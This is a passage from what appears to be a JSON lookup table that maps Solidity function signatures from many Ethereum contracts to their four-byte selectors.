"0xcf4a1612", "scheduleTransaction(uint256,address,bytes)": "0xb03260be", "scheduleTransaction(uint256,address,uint256)": "0x4d5b080c", "scheduleTransaction(address,bytes,uint256)": "0xc0eb2325", "scheduleTransaction(address,bytes)": "0x30c0f8d6", "scheduleTransaction(uint256,address)": "0xb8f71f26", "scheduleTransaction(address)": "0xb0bcc610", "BlockScheduler(address,address)": "0xc3fa5f93", "__proxy(address,bytes)": "0x2667f407", "doThrow(bool)": "0xf0586f0d", "doThrow()": "0xfff78f9c", "computeEndowment(uint256,uint256,uint256,uint256)": "0x93c166ec", "scheduleTransaction()": "0xbf8c50ff", "BaseScheduler(address,address)": "0x66671c71", "sendOwnerEther()": "0x6949a058", "sendPayment()": "0x6720ceb1", "sendDonation()": "0x8dd8596c", "refundClaimDeposit()": "0xb311ee0c", "TransactionRequest(address[4],address,uint256[11],uint256,bytes)": "0xfb87d5ea", "RequestFactory(address)": "0x3f0ec70b", "BUFFER()": "0x8fbc3ecd", "minimumDeposit(uint256)": "0x17e1b09b", "query(address,bytes2,uint256)": "0xb15dcc25", "removeRequest(address)": "0xac8d6030", "addRequest(address,uint256)": "0x09d33f1d", "getNextRequest(address,address)": "0x1acb2719", "getPreviousRequest(address,address)": "0xbf2e694f", "getWindowStart(address,address)": "0x592685d5", "safeCastSigned(uint256)": "0x88102583", "safeMultiply(uint256,uint256)": "0x3dd297da", "flooredSub(uint256,uint256)": "0x09861b81", "createRequest(address[3],address,uint256[11],uint256,bytes)": "0x362af076", "within6Confirms(int256,int256)": "0x9a89ad65", "verifyTx(bytes,int256,int256[],int256,bytes,int256,int256[],int256)": "0x05a5b8c6", "storeBlockWithFeeAndRecipient(bytes,int256,int256,bytes,int256,int256)": "0xfad9bf9e", "storeBlockWithFee(bytes,int256,bytes,int256)": "0x3af75ee1", "storeBlockHeader(bytes,bytes)": "0x6e173a7f", "setInitialParent(int256,int256,int256,int256,int256,int256)": "0xfae8f9a2", "relayTx(bytes,int256,int256[],int256,int256,bytes,int256,int256[],int256,int256)": "0xecb0256b", "priv_inMainChain__(int256,int256)": "0x3c2e7d54", "priv_fastGetBlockHash__(int256,int256)": "0x11400d8e", "helperVerifyHash__(uint256,int256,int256[],int256,uint256,int256,int256[],int256)": "0xace51abc", "getFeeRecipient(int256,int256)": "0x16e27349", "getFeeAmount(int256,int256)": "0xc018d0e6", "getChangeRecipientFee()": "0xfa14df6b", "getChainWork()": "0x2c181929", "getBlockHeader(int256,int256)": "0x9a15f4f3", "getAverageChainWork()": "0x7ca823d5", "feePaid(int256,int256,int256,int256)": "0x157f8f51", "depthCheck(int256,int256)": "0x752d349c", "computeMerkle(int256,int256,int256[],int256,int256,int256[])": "0xca0c1e62", "changeFeeRecipient(int256,int256,int256,int256,int256,int256)": "0x129484b6", "bulkStoreHeader(bytes,int256,bytes,int256)": "0xf9909915", "requestData()": "0x606deecd", "getGas(uint256)": "0xf6bd5893", "GAS_TO_COMPLETE_EXECUTION()": "0xbd35d570", "GAS_TO_AUTHORIZE_EXECUTION()": "0xa126c5df", "DEFAULT_SEND_GAS()": "0x8f420866", "getBlobStore(bytes12)": "0xf42aa287", "getExists(bytes32)": "0x00a676f9", "TransactionRequest(address[3],address,uint256[11],uint256,bytes)": "0xf1fe42b8", "any(bool[7])": "0xcd9a3c98", "validateEndowment(uint256,uint256,uint256,uint256,uint256)": "0x610d5de8", "validateToAddress(address)": "0xd7504385", "validateCallGas(uint256,uint256)": "0xf4c5ab7c", "CALL_GAS_CEILING(uint256)": "0xb5f5962a", "validateRequiredStackDepth(uint256)": "0x3121369d", "MAX_STACK_DEPTH_REQUIREMENT()": "0x17a601b5", "createRequest(address[2],address,uint256[11],uint256,bytes)": "0xf00e8651", "createRequest(address[4],address,uint256[11],uint256,bytes)": "0xc45b415e", "validate(address[4],address,uint256[11],uint256,bytes,uint256)": "0xb3aaa277", "validateTemporalUnit(uint256)": "0x2e898ddc", "validateReservedWindowSize(uint256,uint256)": "0x1a26ed1c", "safeSend(address,uint256,uint256)": "0xeacc5b3b", "safeSend(address,uint256)": "0x07ad9ecb", "GAS_PER_DEPTH()": "0x7fee4ecb", "isKnownRequest(address,address)": "0xc262df45", "receiveExecutionNotification()": "0x964c836c", "EXTRA_GAS()": "0x1d82e9c7", "getTransferable(bytes32)": "0xf0da84f8", "getRetractable(bytes32)": "0x331a72d1", "getEnforceRevisions(bytes32)": "0x0b6fcdb0", "getUpdatable(bytes32)": "0x49437210", "getAllRevisionBlockNumbers(bytes32)": "0xb7dd1d17", "getRevisionBlockNumber(bytes32,uint256)": "0xa95d017d", "getRevisionCount(bytes32)": "0x64228857", "getOwner(bytes32)": "0xdeb931a2", "getInfo(bytes32)": "0x7a02dc06", "_getAllRevisionBlockNumbers(bytes32)": "0x9070b18d", "ETHER_MIN_CONTRIB()": "0x16cb9100", "getCollectedEther()": "0x40eddc4e", "tokensPerETH()": "0x24562747", "category()": "0xef430aa6", "WLMTPrice()": "0x0bcbad90", "etherReceived()": "0x30adce0e", "configRunTime()": "0x18f61c0d", "referalsMinInvestLimit()": "0x5cddd93d", "airdropCurrentTotal()": "0x74b491ff", "falconmasterReq()": "0xef9c3512", "team_lock_count()": "0x719c86e3", "totalDraw()": "0xc53ce034", "totalRemainSupply()": "0x32cd0b3d", "stage_3_price()": "0xe14b7571", "coldStorageYears()": "0x3ab58703", "withdrawAdminRevenue()": "0xe785bab2", "guardInterval()": "0x2ecc8703", "CLAIM_DEADLINE()": "0x42f81580", "jack_nonce()": "0xcfb3b886", "LOCKAMOUNT2()": "0xdb180b2b", "CreaEther()": "0x3d54b48a", "goldLevelBonusIsUsed()": "0xcbdf3878", "SILVER_AMOUNT_XPER()": "0xc0b6762c", "checkVotingForSendWeiFromPayment()": "0x7a657c53", "MILLION_TOKENS()": "0x323df879", "voteC()": "0x9dcee160", "PRICE_PRESALE_WEEK2()": "0x5b1dadc7", "phaseLength()": "0x61012e15", "TotalRate()": "0x2a36b7ac", "totalCastle()": "0x35dfcc92", "AMOUNT_ICO()": "0x0feb376b", "DIV_DIST()": "0x5cbe5f8f", "getBtcRate()": "0xb2e5d3ba", "ExtendLife()": "0xa00c3e72", "PRICE_STAGE_ONE_BONUS()": "0x9c644221", "lastGrantedIndex()": "0x04239743", "preFundingStart()": "0x484dd086", "minerRandomNumber()": "0x992495e2", "daiToken()": "0xbe22f546", "founderTokenUnlockPhase4()": "0x5eb9bbf7", "week4Price()": "0x143f9d1f", "purchaseStartTime()": "0x55832ffc", "_teamSupply()": "0x0517431e", "MAX_WHITELISTED_COUNT()": "0x438195f9", "currentRoundNumber()": "0x9c4780d8", "playerSurrender()": "0x339ac174", "MAX_LOAN_AMOUNT()": "0xceba1794", "kyber()": "0xa2d10ba5", "consolationRewardsRequiredFaith()": "0xbb572896", "minPremium()": "0xeedb9ed5", "contractBlock()": "0x5710ed95", "BONUS_LEVEL_1()": "0xbf2e727b", "LEGAL_EXPENSES_ADDR_1()": "0xdaa0f79f", "getSecondAdmin()": "0xacbdb72c", "valueToBeSent()": "0x1b328100", "weiPerToken()": "0xdab8263a", "RISK_LEVEL()": "0x230a14c0", "usedIcoSupply()": "0xff50fcb6", "createTokens1()": "0x2263f2c5", "KYC_THRESHOLD()": "0x2d133eee", "assetID()": "0x6d6a2859", "currentSalePhase()": "0xf53da97e", "defaultParams()": "0x615dfa5c", "mom()": "0x3df7c86d", "totalPointsPerToken()": "0xfd2994f7", "buyStatus()": "0x3415650e", "blocksPerDeal()": "0xcd73d26c", "objectTome()": "0x7daeef25", "icoRate()": "0xc0b241d7", "current_tier_sold_tokens()": "0xafc3a2ad", "KERNEL_APP_ID()": "0x1113ed0d", "WithdrawalEnabled()": "0x66f7d730", "tokenreward()": "0x968858c8", "ethaddrc()": "0x65ea2b77", "preSalesEndDate()": "0x9bf2ab46", "ethealMultisigWallet()": "0x8059e804", "commBallotPriceWei()": "0xd36ae26b", "founder2()": "0x806ba6d6", "getPreSaleData()": "0x82939b27", "eraIndex()": "0x24fc253e", "MAX_EXCHANGE_FEE_PERCENTAGE()": "0xcb96b0d6", "MIN_IVESTMENT()": "0x6bd70a1f", "fundingPoCEndTime()": "0x1075f186", "isDecentBetToken()": "0x67a4e7c4", "RATE_DAY_14()": "0x87178668", "_price_token_ICO3()": "0x0d9ec228", "turnOffCanUpdateFrontWindowAdjustmentRatio()": "0x323e71fd", "lockedShares()": "0xe95502fb", "proposedMilestones()": "0x03096e92", "joinMiniGame()": "0x9831ca4d", "howManyEtherInWeiToChangeSymbolName()": "0x226dd769", "quater1()": "0xe4a8de44", "totalSupplyExpansionTokens()": "0x72cd700b", "FUTURE_ME_ADDRESS()": "0xdcd58e2f", "prevEndTime()": "0x5b56be8b", "WEEKS_104()": "0x33b58484", "currentGeneration()": "0x8ddb428a", "RoundNumber()": "0x7ac5d8a9", "endtime()": "0x2ca126f8", "TEST_PLAYER()": "0xdf065d78", "receiveApproval(address,uint256,address)": "0x4889ca88", "getTrustSetting(address)": "0x7682e6ff", "updateTrustSettings(address,uint256)": "0xc2a95cc9", "IOU(string,string,uint8)": "0xc08dd1dc", "Transparancy()": "0x17e875e3", "RoundInfo()": "0x979b6f6f", "ContributorList(uint256)": "0x8c88752a", "InvestorList(uint256)": "0x29f27577", "ChangeShownDenomination(bool,bool,bool,bool)": "0x68f65f02", "ChangeName(string)": "0x9f9eac67", "PayoutDividendEarly(uint256,bool)": "0xdabf7dc8", "TieUpLooseEnds()": "0x0a4d564c", "Sqrt()": "0x5afeb106", "NextRoundAndEvents()": "0xc0b6f0c2", "ProcessDividend()": "0x28f03554", "NewContributor(uint256)": "0xa7eeea37", "Contribution(uint256)": "0xb3dfcdc3", "Investment(uint256)": "0xde640e19", "ShortLimit(uint256)": "0xcec1365a", "InputLimit(uint256)": "0xe59f611f", "Start()": "0x1b55ba3a", "GeometricPonzi()": "0x3ac5cb73", "__DeployerFunctions(address,address,uint256)": "0xea2d4cf8", "returnValue()": "0x990c8f79", "getTotalRecords()": "0x0aeacb5e", "maintain(int256,uint256,uint256)": "0x644998ae", "getTime(address)": "0x4b70cec4", "getOwner(address)": "0xfa544161", "getRecord(address)": "0x617fba04", "isRegistered(address)": "0xc3c5a547", "update(address,string,string)": "0x30945443", "addGame(address,string,string)": "0x0d7af726", "distributeValue()": "0xe37aa618", "settings()": "0xe06174e4", "theGames(uint256)": "0x3c21db0a", "GameRegistry()": "0x58150c8b", "mine()": "0x99f4b251", "GavCoin()": "0x1c14179a", "isApprovedFor(address,address)": "0x1fa03a2b", "isApproved(address)": "0x673448dd", "approve(address)": "0xdaea85c5", "coinBalanceOf(address)": "0xbbd39ac0", "coinBalance()": "0xd26c8a8a", "sendCoin(uint256,address)": "0xc86a90fe", "sendCoinFrom(address,uint256,address)": "0x67eae672", "getSaleDate(bytes,uint256)": "0xe2b05077", "getNumOfSalesWithSameId(bytes)": "0x779beca0", "newSale(bytes,uint256,uint256)": "0x09957e69", "WavesPresale()": "0x64ac2c4a", "isSeller(address)": "0xee95feaf", "Badge()": "0x60eb2826", "updateRelease(uint32,uint32,uint32,bytes,bool)": "0x5bc7e259", "updateSigner(address,bool)": "0xf460590b", "nuke()": "0xbc8fbbf8", "release(uint32,uint32,uint32,bytes)": "0x01b869f1", "demote(address)": "0x5c3d005d", "promote(address)": "0xd0e0813a", "proposedVersion()": "0x26db7648", "currentVersion()": "0x9d888e86", "authVotes(address)": "0x64ed31fe", "authProposals()": "0xbf8ecf9c", "signers()": "0x46f0975a", "ReleaseOracle(address[])": "0x7df23b6a", "Matching_Finneys()": "0xf4b2dfea", "historyTimesPlayed(address)": "0xd7c23572", "historyPayout(address)": "0xac5e81a9", "getNickname(address)": "0xadaccd74", "setNickname(string)": "0x1c5d9faa", "getLastRoundResults_by_index(uint256)": "0x477801b1", "getContrarians_by_index(uint256)": "0x3855dcd6", "getMatchers_by_index(uint256)": "0xdfc765dc", "gameSettings()": "0xb7297cf3", "gameStats()": "0xd68199dc", "config(uint256,uint256,uint256,uint256)": "0xcbd08c8c", "reactivate()": "0xd18611d6", "deactivate()": "0x51b42b00", "refundRound()": "0x60f8af90", "endRound()": "0x749aa2d9", "randomEnd()": "0x7f98444f", "randomGen(uint256,uint256)": "0xde14bbf7", "Play(bool)": "0x1a1df394", "Matching_Ethers()": "0x4fa99dd0", "returnFunds()": "0x1eb5ea2e", "calcSHA3(bytes)": "0xa352f1a8", "getCheckRecordTS(bytes)": "0x46e44f63", "getCheckRecordCreator(bytes)": "0x4ac6b2be", "checkRecordExists(bytes)": "0xfa8dc33a", "tryCreateCheckRecord(bytes)": "0xa23744f0", "CheckRepresentment()": "0xcd50d44f", "test(bytes)": "0x2f570a23", "s2b(string)": "0xb028ee13", "named(bytes)": "0xf9a7a2ef", "nameRegAddress()": "0x06005754", "destroy()": "0x83197ef0", "recordWin(uint256,uint256)": "0x744d8b4f", "selectWinner(string)": "0xea3d2827", "setDrawDate(uint256)": "0x8afa08bd", "drawPot(string,string)": "0x6e2cde85", "addValueToContribution(uint256)": "0x1f1f5e76", "addToContribution()": "0xc431f885", "ServiceContract()": "0xddca15de", "decodeTokenOrderTokenAndIsBuy(uint256)": "0xc82f2418", "ServiceContract(uint256,uint256[],uint256[],string,uint256,uint256,uint256[],uint256[],address,address,address,address,address)": "0x3479f017", "decodeOrderTokenAndIsBuy(uint256)": "0xc7098e91", "getNumberOfRatingForAddress(address)": "0x0ad23aad", "transferForAdmin(address,address,uint256)": "0x07c4d580", "getRatingsForAddress(address)": "0x316866bf", "migrateByAdmin_DQV(uint256[])": "0x0000aeb3", "rateAddress(address,uint256)": "0x5560ada8", "cancelByAdmin(uint256[])": "0xd86bc1b0", "RatingsContract(address,address)": "0x4d8f00f4", "matchTokenOrderByAdmin_k44j(uint256[])": "0x00000033", "rejectedBookingfc(uint256)": "0x56f19703", "matchByAdmin_TwH36(uint256[])": "0x000000b6", "acceptedBookingfc(uint256)": "0x17d8fd7a", "withdrawByAdmin_Unau(uint256[])": "0x000000c7", "canceledBookingfc(uint256)": "0xddb1ede9", "registerToken(address,uint256)": "0x02ca5994", "newBookingfc(uint256,address,uint256,uint256,uint256)": "0xaa4859fd", "changeLockPeriod(uint256)": "0xc25cf1d0", "EventHub(address)": "0x5a2450c3", "collectFee(address)": "0x69b59e75", "isDelegate(address)": "0x07779627", "addToAdmin(address,bool)": "0x0f7c9085", "setTradeEventEnabled(bool)": "0x98a36ebf", "unlockMe()": "0x774bafdf", "isRangeInsideRange(uint256,uint256,uint256,uint256)": "0x196cd388", "lockMe()": "0xf912ed00", "isTimestampInsideRange(uint256,uint256,uint256)": "0x029d4b2d", "Joyso(address,address)": "0x31170c0e", "isWeekdayInsideTimestamps(uint256,uint256,uint256)": "0x7b1b0c8a", "retrieveV(uint256)": "0x5767b9ab", "getTimestampOfDayEnd(uint256)": "0xc9ddd12f", "decodeOrderUserId(uint256)": "0x415f47ea", "getTimestampOfDayStart(uint256)": "0x6dc57da6", "migrate(address,uint256,address)": "0x3b9ca2d0", "doDaysFollowEachOther(uint256[])": "0x3949b636", "testingForFun(uint256[])": "0x509f7cf2", "getEndTimeOfSession(uint256,uint256[],uint256)": "0xbae37857", "isStartTimeCorrect(uint256,uint256[])": "0xf0a3dfa4", "Freewatch(uint256,string,uint8,string)": "0x05991e56", "areWeekdaysOpen(uint256[],uint256[],uint256,uint256)": "0xf9bb84f5", "BookingTimeUtils(address)": "0x689effad", "getBonusByDate()": "0x631c07f0", "richtestkk(uint256,string,uint8,string)": "0x0002aa37", "tierMin(uint256)": "0x32e7ecd8", "_createPow(string,address,uint256,uint256,uint256,uint256)": "0xfaba1f16", "createContractPow(string,uint256,uint256,uint256)": "0xf0b1b42e", "createPromoPow(address,string,uint256,uint256,uint256,uint256)": "0xccc6ddf3", "PokemonPow()": "0xe065029e", "denaToken()": "0x0f86e3eb", "BCQ()": "0x5d6b7798", "saveCode(uint256,string)": "0xc80e0ddd", "DarkrenlandToken()": "0x784d17f9", "Dynamic1_5x(uint256)": "0x8748ecda", "ShitsToken()": "0x774f787a", "LomeliToken()": "0xccaa5c65", "ETHPToken()": "0x2db579f2", "f6()": "0x7c396b83", "f5()": "0x3c9d377d", "MANHATTANPROXY3RDAVE()": "0xbc1558be", "f4()": "0xc3f90202", "f3()": "0xaaf05f3d", "f2()": "0x9942ec6f", "f1()": "0xc27fc305", "disableRefunds()": "0xf48c4633", "SKYST()": "0x1733fea0", "LZXToken()": "0x1e9d3bc9", "OracleBitstamp()": "0x92cbeb59", "WyeContract()": "0x6b4c5856", "hunterOf(address)": "0xa9782954", "doom()": "0x26b238d8", "GenoPay()": "0xfa0c3034", "upgradeResistance(uint256)": "0x5996228e", "upgradeConstitution(uint256)": "0x4c97c836", "RelentlessConscienceToken()": "0x38ab8ef4", "OMT()": "0x23fd4524", "BHMBLU()": "0x733ad6e3", "announceWinner(string)": "0xce622ec5", "transferBalance()": "0x66adeb8c", "whichPrice(uint256)": "0xf5d6fa14", "gettimelineandgoal()": "0x7c83b25c", "getdisdone()": "0x48b9ed30", "getPoolAddress()": "0xf586c6d9", "getPoolOwner()": "0x78c53533", "getInvestmentByAddress(address)": "0x382df05d", "gettotalEth()": "0x891a3e23", "getAllInvestors()": "0xd0a2f2c4", "dcntrpls(uint256,uint256,uint256,uint256,uint256,bool)": "0x04155727", "TNTCoin()": "0x7033f1ac", "hasEnoughValidSignatures(bytes,uint8[],bytes32[],bytes32[])": "0xe8a7228b", "ClaimPayout(uint8[],bytes32[],bytes32[],bytes)": "0xe7f56111", "MakeClaim(address)": "0x17743338", "MakeTransaction(address,uint256,uint256)": "0x2dd8a25e", "UpdateRequiredSignatures(uint256)": "0xe93c5973", "ClaimedStatus(address)": "0xa2bf6f7e", "IsClaimed(bytes32)": "0xd4d728fe", "IsAuthority(address)": "0x4176ce68", "RemoveAuthority(address)": "0x094ca5f2", "AddAuthority(address)": "0x6821928b", "listPairForReserve(address,address,bool,bool,bool)": "0xe02584bf", "findBestRate(address,address,uint256)": "0xb8388aca", "searchBestRate(address,address,uint256)": "0xab127a0c", "addReserve(address,bool)": "0xa0d7bb1b", "reservesPerTokenDest(address,uint256)": "0x937e909b", "getUserCapInTokenWei(address,address)": "0x8eaaeecf", "reserves(uint256)": "0x8334278d", "isReserve(address)": "0x7a2b0587", "setExpectedRate(address)": "0x5d270cdc", "reservesPerTokenSrc(address,uint256)": "0x2ab8fc2d", "setFeeBurner(address)": "0x1a79464e", "infoFields(bytes32)": "0x1610b59b", "tradeWithHint(address,address,uint256,address,address,uint256,uint256,address,bytes)": "0x088322ef", "tokenClaims(bytes32,address)": "0x3a29ff34", "determineReward(bytes32)": "0xb2f106c0", "voterReward(address,bytes32,uint256)": "0x24b82a76", "claimRewards(bytes32[],uint256[])": "0x54adc686", "claimReward(bytes32,uint256)": "0x54e0b451", "voterReward(address,uint256)": "0xbd0ae405", "claimRewards(uint256[])": "0x5eac6239", "s_rand(address,uint256)": "0x2c8af2d8", "createERC20Token(string,uint8,string,uint256)": "0x65ababe9", "rewardForBurn(uint256)": "0xc544682b", "priceToMint(uint256)": "0xb9d36743", "createEthCommunityTokenAndMint(string,uint8,string,uint8,uint256)": "0xea8b73df", "createEthCommunityToken(string,uint8,string,uint8)": "0xf2b9541f", "getAnswerCounts()": "0xfa2073ad", "getVotersName()": "0x5d69f68c", "getVotersAnswer()": "0x65b7b357", "giveVote(string,uint8)": "0x150a5655", "safeAdd32(uint32,uint32)": "0xe2e686d0", "safeAdd40(uint40,uint40)": "0x53fc3923", "numberOfChoices()": "0x4d14e344", "votesPerChoice(uint8)": "0xab6f9e4a", "currentResult()": "0xc6c4676c", "thisVotersName()": "0x3b7a3b7f", "thisVotersChoice()": "0xa9f16529", "castVote(string,uint8)": "0x33b3dc04", "nextWave()": "0x9b30a187", "sendDividendsWithRefBonus(address,uint256,uint256)": "0xf67d5a8d", "notZeroNotSender(address)": "0x36c1a50f", "getMemInvestor(address)": "0xa00f77e1", "setPullPaymode()": "0xfc043cad", "setPayerAddr(address)": "0x2b82aed6", "setAdminAddr(address)": "0x41a28df6", "doInvest(address[3])": "0x110dc7a6", "getMyDividends()": "0xd50030ad", "latestPayout()": "0xa4d6bb2b", "adminPercent()": "0xc0dab516", "payerPercent()": "0xbb41f421", "balanceETH()": "0xecbdbb32", "investorsNumber()": "0x653c3174", "toAddr(bytes)": "0xb3a1584a", "toAddr(uint256)": "0x83b14c0a", "isZero(address)": "0x0673c8be", "notZero(address)": "0x88cc852a", "requireNotZero(address)": "0x52879334", "requireNotZero(uint256)": "0x289ea30b", "paymode()": "0x922a8425", "access(address)": "0x6fae3d76", "iterStart()": "0x80ac80b0", "keyFromIndex(uint256)": "0x460d674b", "setRefBonus(address,uint256)": "0xfbeac9c9", "setPaymentTime(address,uint256)": "0x44013585", "addRefBonus(address,uint256)": "0x11302818", "investorShortInfo(address)": "0x993d3489", "investorBaseInfo(address)": "0x743c6775", "investorFullInfo(address)": "0x634d6e57", "whatIsTheMeaningOfLife()": "0x650500c1", "resolveOffer(uint256,bool,bool)": "0x294cedb8", "confirmOffer(uint256)": "0x72a74d5b", "takeOffer(uint256,address)": "0x2b04d8f7", "setArbiter(uint256,address)": "0x10c2c1c1", "addOffer(string,uint256,address)": "0x60c20c16", "setRole(address,string,bool)": "0x8f3984b5", "ROLE_ARBITER()": "0xbb3a77ae", "getEndorsements(bytes32)": "0x3b615624", "endorse(bytes32)": "0xa2e40e50", "getContractAddress(string)": "0x04433bbc", "Vault(bytes32)": "0x0e10e99d", "aaa()": "0x937c0d0a", "isAllowingTransfers()": "0x406d7e98", "highBidder()": "0x3ce123dc", "teamTokensPerPeriod()": "0x36a3668a", "icoRound1()": "0x91a0ba00", "selfAddress()": "0x12e905b0", "erc20Impl()": "0x3c389cc4", "currentPreSale()": "0xee80d7cb", "deathData_a15()": "0x92cdb7d5", "entranceFeePool()": "0x9a1a661e", "secondStageWallet()": "0x10a7a5f5", "crowdsaleEth()": "0x6bb56e8b", "destinationAddress()": "0xca325469", "getEthereumFromPreIco()": "0x2fcf84bf", "stepTwoStartTime()": "0xce9c39c9", "PLATprice()": "0x2a139f75", "exploreFastenETHFee()": "0xcfb9147d", "totalClaimableTokens()": "0x205140c7", "navAdmin()": "0x76e0f978", "totalGuesses()": "0x8ef28249", "getAuctionTotal()": "0xd9ac9a88", "getAuction(uint64)": "0xbc12e3d7", "getAuctionArray(uint64,uint64)": "0xf1496070", "getAuctionIdArray(uint64,uint64)": "0xeeef9d55", "_getAuctionIdArray(uint64,uint64)": "0x17b5f729", "resetSearchStartIndex()": "0x914e1ee1", "_getStartIndex(uint64)": "0xeaf2402d", "depositBonus()": "0x4f0c563f", "shareWithdraw()": "0xc6e994d7", "updateShares()": "0x2a410068", "_shareDevCut(uint256)": "0xc5be7a77", "changePrice(uint256,uint64)": "0x0cf7f3b5", "newAuction(uint256,uint64)": "0x0f3de489", "setDuration(uint64)": "0x4b852c03", "setPrizePool(address)": "0x336c6d39", "setPlatAuction(address)": "0x0ac313e0", "setEOMarketToken(address)": "0x02bb5d6e", "setDataEquip(address)": "0xba112d50", "ActionAuction(address)": "0x3bae795e", "getShareholders()": "0x41ca641e", "totalSold()": "0x9106d7ba", "isOnSaleAny3(uint256,uint256,uint256)": "0xf3b42c40", "isOnSaleAny2(uint256,uint256)": "0xa5c464b3", "isEquipedAny3(address,uint256,uint256,uint256)": "0xf9c71f79", "isEquipedAny2(address,uint256,uint256)": "0x48e06300", "isEquiped(address,uint256)": "0xf761720a", "subFreeMineral(address)": "0xd0946d00", "getRecommender(address)": "0x153154fd", "setReservedTokensListMultiple(address[],uint256[],uint256[])": "0xb4ffaece", "getReservedTokensListValInPercentage(address)": "0x80c190cf", "setReservedTokensList(address,uint256,uint256)": "0xf30f8508", "transferBatch(address[],uint256[])": "0x3b3e672f", "WBIToken(uint256,string,string)": "0x937a9151", "getApprovedTokenCount()": "0x54830df7", "getOwner(bytes)": "0xb102bfbe", "changeLink(bytes,address)": "0x58efe3cd", "setLink(bytes)": "0x866df234", "EusdContract(address,address,address,uint256,uint256,uint256)": "0x26798494", "changeLimit(uint256)": "0x6d33b42b", "amountIAmOwed()": "0x0a44b9cf", "amountOwed(address)": "0xe5cf2297", "totalSpent()": "0xfb346eab", "backlogAmount()": "0x3febb070", "backlogLength()": "0xa0ca0a57", "totalDividends()": "0x997664d7", "KIDToken()": "0x9d5367c5", "CapitalMatchToken()": "0xc463a1af", "HongkongerCoin()": "0xc0b4e657", "stopPreICO()": "0x8d842fad", "getAllQuestionAddresses()": "0x4190cfc1", "getQuestionIndex(uint256)": "0x2bc46f27", "numQuestions()": "0x1ffcb18c", "removeQuestion(address)": "0x49630dda", "addQuestion(string,uint256,uint256,string)": "0xfb7a2c1f", "PredictionMarket()": "0xdb5eef61", "getTheBet(address)": "0x7e7c4243", "getMetadata()": "0x7a5b4f59", "resetFinalize()": "0x07e655eb", "Question(address,string,uint256,uint256,string)": "0x50127418", "produceEmeralds(address,uint256)": "0x11642134", "setProducer(address,bool)": "0xcf46dca7", "EmeraldToken(string,string,uint256)": "0xf13397b4", "LeoCoin()": "0x60566675", "transferToOwner(address)": "0x812d504d", "AMLToken(string,string,uint256,uint256,bool)": "0xbf8faa9c", "SFI()": "0x6532b646", "FOMO()": "0x67e445d9", "CoinealToken()": "0x5904941b", "get_owner()": "0x0ac298dc", "generic_holder()": "0x58ebde43", "changeOwnerWithTokens(address)": "0x3a9588ba", "Eclipse()": "0xe0201e07", "NectarChina()": "0x5ade3f8f", "BarrelAgedFOMO()": "0x8e1eeb09", "PhoneCoin()": "0x9c5d7291", "ZhangHongBinToken()": "0x0ae32e72", "withdrawFees(uint256)": "0x5e318e07", "JOYToken()": "0x3a500ae7", "setPendingManager(address)": "0x72e67d06", "NonOperationalWithdrawManager(address)": "0x0f00dfdb", "_getKey(bytes32,uint256)": "0x1f0276fc", "_isTxExistWithArgs(bytes32,uint256)": "0xb0d2b936", "_multisig(bytes32,uint256)": "0xc65a4068", "getPendingManager()": "0x0302263a", "_revoke(bytes32,address)": "0x25f0fd23", "isTxExist(bytes32)": "0xbe241871", "isPolicyExist(bytes32)": "0xacb0bdc3", "isGroupInPolicy(bytes32,bytes32)": "0x7acb4b0f", "forceRejectVotes(bytes32,address)": "0x469737d5", "setAccessManager(address)": "0xc9580804", "PendingManager(address)": "0x1149b5f5", "getPolicyDetails(bytes4,address)": "0x16090250", "hasConfirmedRecord(bytes32)": "0x95e4c1bf", "decline(bytes32,bytes32)": "0xf88cc87c", "accept(bytes32,bytes32)": "0x531f4c40", "deleteTx(bytes32)": "0xa4c9b0ca", "addTx(bytes32,bytes4,address)": "0x2b828e4a", "removePolicyRule(bytes4,address,bytes32)": "0x11dbb12e", "addPolicyRule(bytes4,address,bytes32,uint256,uint256)": "0x2e79d702", "signOut(address)": "0x1d1ac66a", "getAccountKeys(uint256)": "0x1c07f0a3", "getAvailableVestingAmount(address)": "0x8c30779b", "getVestingAmountByNow(address)": "0x74a3c5d5", "createVestingByDurationAndSplits(address,uint256,uint256,uint256,uint256)": "0x321a7c8c", "setVestingToken(address,address)": "0x30ed54ed", "TokenVesting(address,address)": "0x9c9a4b72", "TierionNetworkToken()": "0xd844a0fa", "WasHere()": "0xf49296ae", "_appendTagged(string,string,string)": "0x112b4495", "_appendTagged(string,string)": "0x837f1bf7", "_tag(bool,string)": "0x65c4b463", "_tag(uint256,string)": "0xad31e845", "_tag(int256,string)": "0x7920f72c", "_tag(string,string)": "0x5e9dbcb7", "htoa(address)": "0xee24bba8", "_ltoa(bool)": "0xb064bb56", "_utoa(uint8)": "0x1132fae4", "_utoa(uint256,uint8)": "0x4725d544", "_itoa(int256,uint8)": "0x48a16b8c", "_stringsEqual(string,string)": "0xae1c9437", "_report(bool,string)": "0x415bd3fa", "balanceIsNotZero(address,string)": "0xee712f59", "balanceIsZero(address,string)": "0xbf125c49", "balanceNotEqual(address,uint256,string)": "0x1cdadfae", "balanceEqual(address,uint256,string)": "0x66ae935f", "lengthNotEqual(bytes32[],uint256,string)": "0x247cf1aa", "lengthEqual(bytes32[],uint256,string)": "0x72a7d8c9", "notEqual(bytes32[],bytes32[],string)": "0xa3c66c1d", "equal(bytes32[],bytes32[],string)": "0x451febcc", "lengthNotEqual(address[],uint256,string)": "0xfb1fdc2e", "lengthEqual(address[],uint256,string)": "0x2d1a6477", "notEqual(address[],address[],string)": "0xb06939a2", "equal(address[],address[],string)": "0x9a40d8f5", "lengthNotEqual(int256[],uint256,string)": "0x1d1997a0", "lengthEqual(int256[],uint256,string)": "0x24415953", "notEqual(int256[],int256[],string)": "0x06ea29c2", "equal(int256[],int256[],string)": "0xa063dae8", "lengthNotEqual(uint256[],uint256,string)": "0x85203aa2", "lengthEqual(uint256[],uint256,string)": "0xfea5d9e0", "notEqual(uint256[],uint256[],string)": "0x1d45e9e1", "equal(uint256[],uint256[],string)": "0x7eb5df39", "isNotZero(int256,string)": "0x073933ed", "isZero(int256,string)": "0xacd5fb23", "isAtMost(int256,int256,string)": "0x91ec845e", "isBelow(int256,int256,string)": "0x8e0f65eb", "isAtLeast(int256,int256,string)": "0x56861450", "isAbove(int256,int256,string)": "0x100fd02f", "notEqual(int256,int256,string)": "0x4e3e4035", "equal(int256,int256,string)": "0xf5bae6b6", "isNotZero(uint256,string)": "0x3108f0d7", "isZero(uint256,string)": "0x0a17d422", "isAtMost(uint256,uint256,string)": "0xb13bdfb6", "isBelow(uint256,uint256,string)": "0xb5ba7074", "isAtLeast(uint256,uint256,string)": "0x79f7a873", "isAbove(uint256,uint256,string)": "0x69815435", "notEqual(uint256,uint256,string)": "0x561015e2", "equal(uint256,uint256,string)": 